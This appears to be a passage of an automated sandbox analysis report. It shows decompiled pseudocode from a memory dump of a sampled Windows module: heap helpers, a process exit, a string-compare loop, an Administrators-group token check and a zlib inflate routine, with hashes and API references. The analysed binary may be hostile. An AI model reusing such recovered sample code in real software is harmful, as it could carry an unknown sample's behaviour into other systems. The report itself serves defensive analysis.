							_v8 = _a4 + 0x24;
							while(1) {
								_t28 = lstrcmpiA(_v8,  *( *((intOrPtr*)(_t38 + _t34 + 0xc)) + _t35 * 4));
								_t14 =  &(_t41[2]); // 0xe6840d8b
								_t34 =  *_t14;
								if(_t28 == 0) {
									break;
								}
								_t35 = _a8 + 1;
								_a8 = _t35;
								if(_t35 <  *((intOrPtr*)(_t34 + _t38 + 8))) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t41 =  *_t41 |  *(_t34 + _t38);
						}
						L8:
						_t31 = _t31 + 1;
						_t38 = _t38 + 0x10;
						_t20 =  &(_t41[1]); // 0x1374ff85
					} while (_t31 <  *_t20);
				}
				Sleep(0xa);
				return 1;
			}

0x1000ccd1
0x1000ccd4
0x1000ccd9
0x1000ccdc
0x1000ccde
0x1000ccde
0x1000ccde
0x1000cce1
0x1000cce3
0x1000ccea
0x1000ccf2
0x1000ccf5
0x1000ccff
0x1000cd05
0x1000cd05
0x1000cd0a
0x00000000
0x00000000
0x1000cd0f
0x1000cd10
0x1000cd17
0x00000000
0x00000000
0x1000cd19
0x00000000
0x1000cd17
0x1000cd1e
0x1000cd1e
0x1000cd20
0x1000cd20
0x1000cd21
0x1000cd24
0x1000cd24
0x1000cd29
0x1000cd31
0x1000cd3d

APIs

lstrcmpiA.KERNEL32(?,?,00000128,00000000,?,?,?,1000ABF3,?,?), ref: 1000CCFF
Sleep.KERNELBASE(0000000A,00000000,?,?,?,1000ABF3,?,?), ref: 1000CD31

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleeplstrcmpi
String ID:
API String ID: 1261054337-0
Opcode ID: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction ID: 926fc2af3184635391a797f2ab8243a47acf96363bf1e1ad5409ce987fcc7f05
Opcode Fuzzy Hash: d589c2e27be55aab14665e750e2f3d45a62fba7c08b0dfb6dc3d34da2db7017b
Instruction Fuzzy Hash: 21018C31600709AFEB10CF6AC8C0D5AB7E6FF983A4711C07EE95A8B215D230FA42DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005E7E, Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005E7E() {
				intOrPtr _t3;

				_t3 =  *0x1001e684; // 0x306f878
				 *((intOrPtr*)(_t3 + 0x2c))( *0x1001e6a8, 0xffffffff);
				ExitProcess(0);
			}

0x10005e7e
0x10005e8b
0x10005e95

APIs

ExitProcess.KERNEL32(00000000), ref: 10005E95

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction ID: 9fe5a48d1d7df1d44c8ff89900a8b99800cce3c20b8b2062506d45ae6f81fc06
Opcode Fuzzy Hash: 5cd9b7efdf0ac82a49e6ca76f2220a9fceff99eff54594cf8359571d6987a725
Instruction Fuzzy Hash: D4C002712151A1AFEA409BA4CD88F0877A1AB68362F9282A5F5259A1F6CA30D8009B11

Uniqueness

Uniqueness Score: -1.00%

Function 100085D5, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100085D5() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x1001e768 = _t1;
				return _t1;
			}

0x100085de
0x100085e4
0x100085e9

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,10005F84), ref: 100085DE

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: c3188154532433d8b109a5d37b9c6942cb9ab30fb6aa49832194727f4698bc8e
Instruction ID: 016c441e565f87a7eecd2a7559f4fcf8aaa250baf654664f6a0682c010cac13f
Opcode Fuzzy Hash: c3188154532433d8b109a5d37b9c6942cb9ab30fb6aa49832194727f4698bc8e
Instruction Fuzzy Hash: C7B012B0684B1056F2D01B204DC6B043590A308B0AF304000F308581D0C6B05104CB04

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA48, Relevance: 1.3, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000BA48(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000B92C(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000B97E(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						CloseHandle(_v16);
						if(_t48 != 0) {
							E10008600( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x1001e68c; // 0x306fa40
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x1001e68c; // 0x306fa40
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x1001e68c; // 0x306fa40
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

0x1000ba4f
0x1000ba51
0x1000ba58
0x1000ba5a
0x1000ba5d
0x1000ba62
0x1000ba67
0x1000ba71
0x1000ba74
0x1000ba77
0x1000ba7c
0x1000ba7e
0x1000ba84
0x1000bae4
0x1000baec
0x1000baf2
0x1000baf9
0x1000baff
0x00000000
0x1000bb00
0x1000ba89
0x1000ba8a
0x1000ba8b
0x1000ba8c
0x1000ba8d
0x1000ba8e
0x1000ba8f
0x1000ba90
0x1000ba95
0x1000ba97
0x1000ba9c
0x1000ba9d
0x1000baa7
0x00000000
0x00000000
0x1000baab
0x1000bad7
0x1000bad7
0x1000badf
0x1000bae2
0x00000000
0x1000bae2
0x1000baad
0x1000baad
0x1000bab0
0x1000bab3
0x1000bab3
0x1000bab6
0x1000bab8
0x1000bac2
0x00000000
0x00000000
0x1000bac7
0x1000bac8
0x1000bacb
0x1000bad0
0x00000000
0x00000000
0x00000000
0x1000bad2
0x1000bad6
0x00000000
0x1000bad6
0x1000bb05

APIs

Part of subcall function 1000B92C: GetCurrentThread.KERNEL32 ref: 1000B93F
Part of subcall function 1000B92C: GetLastError.KERNEL32(?,?,1000BA62,73BCF500,10000000), ref: 1000B94D
Part of subcall function 1000B92C: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,1000BA62,73BCF500,10000000), ref: 1000B966

Part of subcall function 1000B97E: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,73BCF500,00000000,10000000,00000000,00000000,?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B999
Part of subcall function 1000B97E: GetLastError.KERNEL32(?,1000BA1D,?,00000000,?,1000D0B3), ref: 1000B9A0

CloseHandle.KERNELBASE(?,00000000,73BCF500,10000000), ref: 1000BAEC

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentErrorLast$CloseHandleInformationProcessThreadToken
String ID:
API String ID: 3752664914-0
Opcode ID: 9ae93498d3beea09f533c95f90db021d1976d1c1be687782160d81f63b76ad47
Instruction ID: 1adc8f8ddfe33038bce3f4a157c31629282edc9b40e44d36358bc691b51babd1
Opcode Fuzzy Hash: 9ae93498d3beea09f533c95f90db021d1976d1c1be687782160d81f63b76ad47
Instruction Fuzzy Hash: 75215071A00619AFEB04DFA9DC85EAEB7F8EF48780B514069F601E7255D730DD00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 100085EA, Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100085EA(long _a4) {
				void* _t2;

				_t2 = HeapAlloc( *0x1001e768, 8, _a4); // executed
				return _t2;
			}

0x100085f8
0x100085ff

APIs

HeapAlloc.KERNEL32(00000008,?,?,10008F6A,00000100,?,10005FA8), ref: 100085F8

Memory Dump Source

Source File: 00000000.00000002.697052949.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.697045177.0000000010000000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: f52ff42663d9d892c94b44c72d67274e92aa5b68dc6bf6c7fa1343fdaf41d4b4
Instruction ID: 9a291c990e77f445172f2a03277bd68ee76f3999a476da38a02c0ca707d440ed
Opcode Fuzzy Hash: f52ff42663d9d892c94b44c72d67274e92aa5b68dc6bf6c7fa1343fdaf41d4b4
Instruction Fuzzy Hash: CDB0923148461CFBFA421B91DC45A88BF69E708759F00C010F60C040B2CA72AA649B90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1001538F, Relevance: 8.1, Strings: 6, Instructions: 577
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E1001538F(void* __edi) {
				signed int _t164;
				unsigned int _t172;
				unsigned int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t182;
				signed int _t184;
				unsigned int _t185;
				int _t186;
				int _t194;
				signed char _t200;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				int _t210;
				int _t222;
				signed int _t227;
				signed int _t235;
				signed int _t251;
				signed char _t252;
				unsigned int _t253;
				signed char _t254;
				signed int* _t255;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t266;
				intOrPtr _t271;
				signed char _t278;
				signed int _t279;
				char* _t280;
				signed int _t282;
				signed char _t284;
				signed int _t287;
				signed int _t291;
				int _t292;
				int _t293;
				int _t296;
				int _t298;
				int _t302;
				signed int _t305;
				signed char _t311;
				signed char _t312;
				signed char _t315;
				signed char _t316;
				signed int _t318;
				int _t319;
				int _t320;
				signed char _t322;
				int _t324;
				int _t326;
				int _t330;
				signed int _t333;
				signed char _t336;
				signed char _t337;
				signed char _t339;
				int _t341;
				signed int _t347;
				int _t349;
				intOrPtr _t350;
				intOrPtr _t351;
				unsigned int _t356;
				unsigned int _t361;
				signed int _t364;
				signed int _t365;
				intOrPtr _t367;
				void* _t368;
				intOrPtr* _t380;
				void* _t381;
				intOrPtr* _t389;
				void* _t390;
				signed int _t395;
				void* _t396;
				signed int _t397;
				void* _t403;
				void* _t405;
				intOrPtr* _t412;
				void* _t413;
				signed int _t414;
				void* _t416;
				intOrPtr* _t423;
				void* _t424;
				unsigned int _t430;
				signed int _t431;
				void* _t434;
				signed int* _t435;
				void* _t439;

				 *((intOrPtr*)(__edi + 0x56))();
				asm("pushfd");
				_t435 = _t434 - 0x40;
				asm("cld");
				_t395 = _t435[0x16];
				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
				_t164 =  *_t395;
				_t435[0xb] = _t164;
				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
				_t271 =  *((intOrPtr*)(_t395 + 0x10));
				_t251 =  *(_t395 + 0xc);
				_t435[0xf] = _t251;
				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
				_t435[4] = _t271 - 0x101 + _t251;
				_t435[2] =  *(_t367 + 0x4c);
				_t435[3] =  *(_t367 + 0x50);
				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
				_t172 =  *(_t367 + 0x28);
				_t347 =  *(_t367 + 0x34);
				_t435[0xd] = _t172;
				_t435[0xc] =  *(_t367 + 0x30);
				_t435[0xe] = _t347;
				_t430 =  *(_t367 + 0x38);
				_t252 =  *(_t367 + 0x3c);
				_t396 = _t435[0xb];
				_t278 = _t435[5];
				if(_t278 > _t396) {
					L2:
					if((_t396 & 0x00000003) != 0) {
						_t396 = _t396 + 1;
						_t278 = _t252;
						_t252 = _t252 + 8;
						_t172 = 0 << _t278;
						_t430 = _t430 | _t172;
						goto L2;
					}
					goto L4;
				} else {
					_t341 = _t278 + 0xb - _t396;
					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
					_t435 =  &(_t435[6]);
					_t278 = 0;
					_t396 =  &(_t435[7]);
					_t435[5] = _t396;
					L4:
					_t368 = _t435[0xf];
					while(1) {
						_t439 =  *0x1001d040 - 2;
						if(_t439 == 0) {
							break;
						}
						if(_t439 > 0) {
							do {
								if(_t252 <= 0xf) {
									asm("lodsw");
									_t322 = _t252;
									_t252 = _t252 + 0x10;
									_t430 = _t431 | 0 << _t322;
								}
								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
								while(1) {
									_t253 = _t252 - _t173;
									_t431 = _t430 >> _t173;
									if(_t173 == 0) {
										asm("stosb");
										goto L22;
									}
									_t356 = _t173 >> 0x10;
									_t311 = _t173;
									if((_t173 & 0x00000010) == 0) {
										if((_t173 & 0x00000040) != 0) {
											L97:
											if((_t173 & 0x00000020) == 0) {
												_t280 = "invalid literal/length code";
												_t350 = 0x1a;
											} else {
												_t280 = 0;
												_t350 = 0xb;
											}
											L101:
											_t174 = _t435[0x16];
											if(_t280 != 0) {
												 *(_t174 + 0x18) = _t280;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
											goto L104;
										}
										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
										continue;
									}
									_t312 = _t311 & 0x0000000f;
									if(_t312 != 0) {
										if(_t253 < _t312) {
											asm("lodsw");
											_t339 = _t253;
											_t253 = _t253 + 0x10;
											_t431 = _t431 | 0 << _t339;
											_t312 = _t339;
										}
										_t253 = _t253 - _t312;
										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
										_t431 = _t431 >> _t312;
										_t356 = _t356 + _t235;
									}
									_t435[6] = _t356;
									if(_t253 <= 0xf) {
										asm("lodsw");
										_t337 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t337;
									}
									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
									while(1) {
										_t361 = _t200 >> 0x10;
										_t253 = _t253 - _t200;
										_t431 = _t431 >> _t200;
										_t315 = _t200;
										if((_t200 & 0x00000010) != 0) {
											break;
										}
										if((_t200 & 0x00000040) != 0) {
											L96:
											_t280 = "invalid distance code";
											_t350 = 0x1a;
											goto L101;
										}
										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
									}
									_t316 = _t315 & 0x0000000f;
									if(_t316 == 0) {
										if(_t361 != 1 || _t435[0xa] == _t368) {
											L38:
											_t435[0xb] = _t396;
											_t207 = _t368 - _t435[0xa];
											if(_t207 < _t361) {
												_t208 = _t435[0xd];
												_t318 =  ~_t207;
												_t414 = _t435[0xe];
												if(_t208 < _t361) {
													L100:
													_t396 = _t435[0xb];
													_t280 = "invalid distance too far back";
													_t350 = 0x1a;
													goto L101;
												}
												_t319 = _t318 + _t361;
												if(_t435[0xc] != 0) {
													_t209 = _t435[0xc];
													if(_t319 <= _t209) {
														_t416 = _t414 + _t209 - _t319;
														_t210 = _t435[6];
														if(_t210 > _t319) {
															_t210 = memcpy(_t368, _t416, _t319);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t319 + _t319;
															_t416 = _t368 - _t361;
														}
													} else {
														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
														_t324 = _t319 - _t209;
														_t210 = _t435[6];
														if(_t210 > _t324) {
															_t210 = memcpy(_t368, _t416, _t324);
															_t435 =  &(_t435[3]);
															_t368 = _t416 + _t324 + _t324;
															_t416 = _t435[0xe];
															_t326 = _t435[0xc];
															if(_t210 > _t326) {
																_t210 = memcpy(_t368, _t416, _t326);
																_t435 =  &(_t435[3]);
																_t368 = _t416 + _t326 + _t326;
																_t416 = _t368 - _t361;
															}
														}
													}
												} else {
													_t416 = _t414 + _t208 - _t319;
													_t210 = _t435[6];
													if(_t210 > _t319) {
														_t210 = memcpy(_t368, _t416, _t319);
														_t435 =  &(_t435[3]);
														_t368 = _t416 + _t319 + _t319;
														_t416 = _t368 - _t361;
													}
												}
												_t320 = _t210;
												memcpy(_t368, _t416, _t320);
												_t435 =  &(_t435[3]);
												_t368 = _t416 + _t320 + _t320;
												_t396 = _t435[0xb];
												goto L22;
											}
											_t423 = _t368 - _t361;
											_t330 = _t435[6] - 3;
											 *_t368 =  *_t423;
											_t424 = _t423 + 3;
											 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t423 + 1));
											 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t423 + 2));
											memcpy(_t368 + 3, _t424, _t330);
											_t435 =  &(_t435[3]);
											_t368 = _t424 + _t330 + _t330;
											_t396 = _t435[0xb];
										} else {
											_t389 = _t368 - 1;
											_t222 =  *_t389;
											_t333 = _t435[6] - 3;
											 *(_t389 + 1) = _t222;
											 *(_t389 + 2) = _t222;
											 *(_t389 + 3) = _t222;
											_t390 = _t389 + 4;
											memset(_t390, _t222, _t333 << 0);
											_t435 =  &(_t435[3]);
											_t368 = _t390 + _t333;
										}
										goto L22;
									}
									if(_t253 < _t316) {
										asm("lodsw");
										_t336 = _t253;
										_t253 = _t253 + 0x10;
										_t431 = _t431 | 0 << _t336;
										_t316 = _t336;
									}
									_t253 = _t253 - _t316;
									_t227 = (0x00000001 << _t316) - 0x00000001 & _t431;
									_t431 = _t431 >> _t316;
									_t361 = _t361 + _t227;
									goto L38;
								}
								L22:
							} while (_t435[4] > _t368 && _t435[5] > _t396);
							L104:
							if( *0x1001d040 == 2) {
								_t253 = _t431;
							}
							_t176 = _t435[0x16];
							_t351 =  *((intOrPtr*)(_t176 + 0x1c));
							_t282 = _t253 >> 3;
							_t397 = _t396 - _t282;
							_t254 = _t253 - (_t282 << 3);
							 *(_t176 + 0xc) = _t368;
							 *(_t351 + 0x3c) = _t254;
							_t284 = _t254;
							_t255 =  &(_t435[7]);
							if(_t435[5] == _t255) {
								_t266 =  *_t176;
								_t435[5] = _t266;
								_t397 = _t397 - _t255 + _t266;
								_t435[5] = _t435[5] +  *((intOrPtr*)(_t176 + 4)) - 0xb;
							}
							 *_t176 = _t397;
							_t258 = (1 << _t284) - 1;
							if( *0x1001d040 == 2) {
								asm("psrlq mm0, mm1");
								asm("movd ebp, mm0");
								asm("emms");
							}
							 *(_t351 + 0x38) = _t431 & _t258;
							_t259 = _t435[5];
							if(_t259 <= _t397) {
								 *((intOrPtr*)(_t176 + 4)) =  ~(_t397 - _t259) + 0xb;
							} else {
								 *((intOrPtr*)(_t176 + 4)) = _t259 - _t397 + 0xb;
							}
							_t260 = _t435[4];
							if(_t260 <= _t368) {
								 *((intOrPtr*)(_t176 + 0x10)) =  ~(_t368 - _t260) + 0x101;
							} else {
								 *((intOrPtr*)(_t176 + 0x10)) = _t260 - _t368 + 0x101;
							}
							asm("popfd");
							return _t176;
						}
						_push(_t172);
						_push(_t252);
						_push(_t278);
						_push(_t347);
						asm("pushfd");
						 *_t435 =  *_t435 ^ 0x00200000;
						asm("popfd");
						asm("pushfd");
						_pop(_t364);
						_t365 = _t364 ^  *_t435;
						if(_t365 == 0) {
							L15:
							 *0x1001d040 = 3;
							L16:
							_pop(_t347);
							_pop(_t278);
							_pop(_t252);
							_pop(_t172);
							continue;
						}
						asm("cpuid");
						if(_t252 != 0x756e6547 || _t278 != 0x6c65746e || _t365 != 0x49656e69) {
							goto L15;
						} else {
							asm("cpuid");
							if(0xd != 6 || (_t365 & 0x00800000) == 0) {
								goto L15;
							} else {
								 *0x1001d040 = 2;
								goto L16;
							}
						}
					}
					asm("emms");
					asm("movd mm0, ebp");
					_t431 = _t252;
					asm("movd mm4, dword [esp]");
					asm("movq mm3, mm4");
					asm("movd mm5, dword [esp+0x4]");
					asm("movq mm2, mm5");
					asm("pxor mm1, mm1");
					_t253 = _t435[2];
					do {
						asm("psrlq mm0, mm1");
						if(_t431 <= 0x20) {
							asm("movd mm6, ebp");
							asm("movd mm7, dword [esi]");
							_t396 = _t396 + 4;
							asm("psllq mm7, mm6");
							_t431 = _t431 + 0x20;
							asm("por mm0, mm7");
						}
						asm("pand mm4, mm0");
						asm("movd eax, mm4");
						asm("movq mm4, mm3");
						_t173 =  *(_t253 + _t172 * 4);
						while(1) {
							_t279 = _t173 & 0x000000ff;
							asm("movd mm1, ecx");
							_t431 = _t431 - _t279;
							if(_t173 == 0) {
								break;
							}
							_t349 = _t173 >> 0x10;
							if((_t173 & 0x00000010) == 0) {
								if((_t173 & 0x00000040) != 0) {
									goto L97;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t173 =  *(_t253 + ((_t279 &  *(0x1001530c + (_t173 & 0x0000000f) * 4)) + _t349) * 4);
								continue;
							}
							_t178 = _t173 & 0x0000000f;
							if(_t178 != 0) {
								asm("psrlq mm0, mm1");
								asm("movd mm1, eax");
								asm("movd ecx, mm0");
								_t431 = _t431 - _t178;
								_t349 = _t349 + (_t279 &  *(0x1001530c + _t178 * 4));
							}
							asm("psrlq mm0, mm1");
							if(_t431 <= 0x20) {
								asm("movd mm6, ebp");
								asm("movd mm7, dword [esi]");
								_t396 = _t396 + 4;
								asm("psllq mm7, mm6");
								_t431 = _t431 + 0x20;
								asm("por mm0, mm7");
							}
							asm("pand mm5, mm0");
							asm("movd eax, mm5");
							asm("movq mm5, mm2");
							_t179 =  *(_t435[3] + _t178 * 4);
							while(1) {
								_t287 = _t179 & 0x000000ff;
								_t253 = _t179 >> 0x10;
								_t431 = _t431 - _t287;
								asm("movd mm1, ecx");
								if((_t179 & 0x00000010) != 0) {
									break;
								}
								if((_t179 & 0x00000040) != 0) {
									goto L96;
								}
								asm("psrlq mm0, mm1");
								asm("movd ecx, mm0");
								_t179 =  *(_t435[3] + ((_t287 &  *(0x1001530c + (_t179 & 0x0000000f) * 4)) + _t253) * 4);
							}
							_t182 = _t179 & 0x0000000f;
							if(_t182 == 0) {
								if(_t253 != 1 || _t435[0xa] == _t368) {
									L76:
									_t435[0xb] = _t396;
									_t184 = _t368 - _t435[0xa];
									if(_t184 < _t253) {
										_t185 = _t435[0xd];
										_t291 =  ~_t184;
										_t403 = _t435[0xe];
										if(_t185 < _t253) {
											goto L100;
										}
										_t292 = _t291 + _t253;
										if(_t435[0xc] != 0) {
											_t186 = _t435[0xc];
											if(_t292 <= _t186) {
												_t405 = _t403 + _t186 - _t292;
												if(_t349 > _t292) {
													_t349 = _t349 - _t292;
													memcpy(_t368, _t405, _t292);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t292 + _t292;
													_t405 = _t368 - _t253;
												}
											} else {
												_t405 = _t403 + _t435[0xd] + _t186 - _t292;
												_t296 = _t292 - _t186;
												if(_t349 > _t296) {
													_t349 = _t349 - _t296;
													memcpy(_t368, _t405, _t296);
													_t435 =  &(_t435[3]);
													_t368 = _t405 + _t296 + _t296;
													_t405 = _t435[0xe];
													_t298 = _t435[0xc];
													if(_t349 > _t298) {
														_t349 = _t349 - _t298;
														memcpy(_t368, _t405, _t298);
														_t435 =  &(_t435[3]);
														_t368 = _t405 + _t298 + _t298;
														_t405 = _t368 - _t253;
													}
												}
											}
										} else {
											_t405 = _t403 + _t185 - _t292;
											if(_t349 > _t292) {
												_t349 = _t349 - _t292;
												memcpy(_t368, _t405, _t292);
												_t435 =  &(_t435[3]);
												_t368 = _t405 + _t292 + _t292;
												_t405 = _t368 - _t253;
											}
										}
										_t293 = _t349;
										_t172 = memcpy(_t368, _t405, _t293);
										_t435 =  &(_t435[3]);
										_t368 = _t405 + _t293 + _t293;
										_t396 = _t435[0xb];
										_t253 = _t435[2];
										goto L64;
									}
									_t412 = _t368 - _t253;
									_t302 = _t349 - 3;
									 *_t368 =  *_t412;
									_t413 = _t412 + 3;
									 *((char*)(_t368 + 1)) =  *((intOrPtr*)(_t412 + 1));
									 *((char*)(_t368 + 2)) =  *((intOrPtr*)(_t412 + 2));
									_t172 = memcpy(_t368 + 3, _t413, _t302);
									_t435 =  &(_t435[3]);
									_t368 = _t413 + _t302 + _t302;
									_t396 = _t435[0xb];
									_t253 = _t435[2];
									goto L64;
								} else {
									_t380 = _t368 - 1;
									_t194 =  *_t380;
									_t305 = _t349 - 3;
									 *(_t380 + 1) = _t194;
									 *(_t380 + 2) = _t194;
									 *(_t380 + 3) = _t194;
									_t381 = _t380 + 4;
									_t172 = memset(_t381, _t194, _t305 << 0);
									_t435 =  &(_t435[3]);
									_t368 = _t381 + _t305;
									_t253 = _t435[2];
									L64:
									if(_t435[4] <= _t368) {
										goto L104;
									}
									goto L65;
								}
							}
							asm("psrlq mm0, mm1");
							asm("movd mm1, eax");
							asm("movd ecx, mm0");
							_t431 = _t431 - _t182;
							_t253 = _t253 + (_t287 &  *(0x1001530c + _t182 * 4));
							goto L76;
						}
						_t172 = _t173 >> 0x10;
						asm("stosb");
						goto L64;
						L65:
					} while (_t435[5] > _t396);
					goto L104;
				}
			}

0x1001538f
0x10015394
0x10015395
0x10015398
0x10015399
0x1001539d
0x100153a3
0x100153aa
0x100153ae
0x100153b6
0x100153b9
0x100153ca
0x100153ce
0x100153d2
0x100153dc
0x100153e0
0x100153ef
0x100153fd
0x10015401
0x10015407
0x1001540a
0x1001540e
0x10015412
0x10015416
0x10015419
0x1001541c
0x10015420
0x10015426
0x1001544a
0x10015450
0x10015456
0x10015457
0x10015459
0x1001545c
0x1001545e
0x00000000
0x1001545e
0x00000000
0x10015428
0x1001542b
0x1001543e
0x1001543e
0x1001543e
0x10015440
0x10015444
0x10015462
0x10015462
0x10015466
0x10015466
0x1001546d
0x00000000
0x00000000
0x10015473
0x100154e0
0x100154e3
0x100154e7
0x100154e9
0x100154eb
0x100154f0
0x100154f0
0x100154fb
0x100154fe
0x10015500
0x10015502
0x10015506
0x1001550b
0x1001550b
0x1001550b
0x10015523
0x10015526
0x1001552a
0x10015626
0x1001593a
0x1001593c
0x1001594a
0x1001594f
0x1001593e
0x1001593e
0x10015943
0x10015943
0x10015966
0x10015966
0x1001596c
0x1001596e
0x1001596e
0x10015974
0x00000000
0x10015974
0x1001563c
0x00000000
0x1001563c
0x10015530
0x10015533
0x10015537
0x1001553d
0x1001553f
0x10015541
0x10015546
0x10015548
0x10015548
0x10015552
0x10015554
0x10015556
0x10015558
0x10015558
0x1001555a
0x10015561
0x10015565
0x10015567
0x10015569
0x1001556e
0x1001556e
0x1001557a
0x1001557d
0x1001557f
0x10015584
0x10015586
0x10015588
0x1001558c
0x00000000
0x00000000
0x10015646
0x1001592e
0x1001592e
0x10015933
0x00000000
0x10015933
0x1001565c
0x1001565c
0x10015592
0x10015595
0x100155ff
0x100155be
0x100155be
0x100155c4
0x100155ca
0x10015666
0x1001566a
0x1001566c
0x10015672
0x10015956
0x10015956
0x1001595a
0x1001595f
0x00000000
0x1001595f
0x10015678
0x1001567f
0x100156a5
0x100156ab
0x100156db
0x100156dd
0x100156e3
0x100156e7
0x100156e7
0x100156e7
0x100156eb
0x100156eb
0x100156ad
0x100156b3
0x100156b5
0x100156b7
0x100156bd
0x100156c1
0x100156c1
0x100156c1
0x100156c3
0x100156c7
0x100156cd
0x100156d1
0x100156d1
0x100156d1
0x100156d5
0x100156d5
0x100156cd
0x100156bd
0x10015681
0x10015683
0x10015685
0x1001568b
0x1001568f
0x1001568f
0x1001568f
0x10015693
0x10015693
0x1001568b
0x100156ed
0x100156ef
0x100156ef
0x100156ef
0x100156f1
0x00000000
0x100156f1
0x100155d6
0x100155d8
0x100155dd
0x100155e5
0x100155e8
0x100155eb
0x100155f1
0x100155f1
0x100155f1
0x100155f3
0x10015607
0x10015607
0x1001560c
0x1001560e
0x10015611
0x10015614
0x10015617
0x1001561a
0x1001561d
0x1001561d
0x1001561d
0x1001561d
0x00000000
0x100155ff
0x10015599
0x1001559f
0x100155a1
0x100155a3
0x100155a8
0x100155aa
0x100155aa
0x100155b4
0x100155b6
0x100155b8
0x100155ba
0x00000000
0x100155ba
0x1001550c
0x1001550c
0x10015978
0x1001597f
0x10015981
0x10015981
0x10015983
0x10015989
0x1001598c
0x1001598f
0x10015994
0x10015996
0x10015999
0x1001599c
0x1001599e
0x100159a6
0x100159aa
0x100159ac
0x100159b0
0x100159b8
0x100159b8
0x100159bc
0x100159c5
0x100159cd
0x100159cf
0x100159d2
0x100159d5
0x100159d5
0x100159d9
0x100159dc
0x100159e2
